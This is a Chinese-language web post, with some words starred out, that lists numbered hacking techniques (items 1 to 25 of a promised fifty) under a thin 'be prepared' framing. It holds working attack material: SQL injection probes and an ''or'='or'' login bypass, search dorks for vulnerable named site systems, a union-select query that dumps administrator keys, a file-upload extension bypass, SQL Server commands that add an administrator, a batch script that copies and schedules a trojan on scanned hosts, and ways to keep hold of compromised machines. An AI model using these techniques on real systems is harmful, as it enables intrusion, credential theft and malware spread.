现在网上的***事件越来越多,***都是通过什么方法来***我们的呢?下面我们给大家总结了******网络的五十种方法,让大家做到有备无患。 
  1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
  2.搜索栏里输入
  关键字%’and 1=1 and ’%’=’
  关键字%’and 1=2 and ’%’=’
  比较不同处 可以作为注入的特征字符
  3.登陆框用户名和密码输入’or’=’or’ 漏洞很老但是现在很是遍地都是
  4.我们先到[url]www.google.com[/url]底下搜索一下co net mib ver 1.0
  密码帐号都是 ’or’=’or’
  5.挂马代码
  6.[url]http://www.wyyfk.com/24[/url]小时挂QQ工具
  7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被***过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
  net localgroup administrators还是可以看出guest是管理员来
  7.只要敢想,新浪也可*** 注入点
  微软官方网站注入点
  8.ms05016***工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上QQ大盗***
  9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
  sql注入后,如何上传***,
  10.QQ强制聊天代码
  [url]http://wpa.qq.com/msgrd?v=1&uin[/url]=对方的QQ号&sITe=ioshenmue&menu=yes
  使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发QQ消息。
  11. mybbs论坛cookie欺骗 后台备份马
  12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
  用法: 安装: instsrv.exe 服务名称 路径
  卸载: instsrv.exe 服务名称 remove
  13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submIT=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码
  14.搜索的技巧 inurl:网址
  15.启航工作室wms 5.0网站程序漏洞

  在baidu 搜索powered by: sailingstudio websITe manage system 5.0 (sp1)

  利用动画看[url]http://soft.77169.com/62/20050530/6824.html[/url]

  16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以***不会变~

  17.天意商务系统网上依然有 有漏洞 网站具体的样式[url]http://www.wzgcc.org/[/url]

  工具下载[url]www.hack6.com[/url]

  地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面

  18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉

  不能注入时要第一时间想到%5c暴库

  19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了

  工具使用方法动画和所有文件

  [url]http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811[/url]

  20.缺少xp_cmdshell时

  尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’

  假如恢复不成功,可以尝试直接加用户(针对开3389的)

  declare @o int

  exec sp_oacreate ’wscript.shell’,@o out

  exec sp_oamethod @o,’run’,null,’cmd.exe /c net user ating ating /add’ 再提到管理员
21.批量种植***.bat 

  for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$Content$nbsp;复制***到扫描的计算机当中

  for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行***的时间

  扫描地址.txt里每个主机名一行 用\\开头

  22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址[url]www.hack6.com[/url]

  23.dv7.1用还原数据功能 还原asa***

  24.凡人网络购物系统v6.0 可以%5c暴库

  25.ipb2.0.2漏洞 构造语句

  $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 [url]www.hack6.com[/url]有下载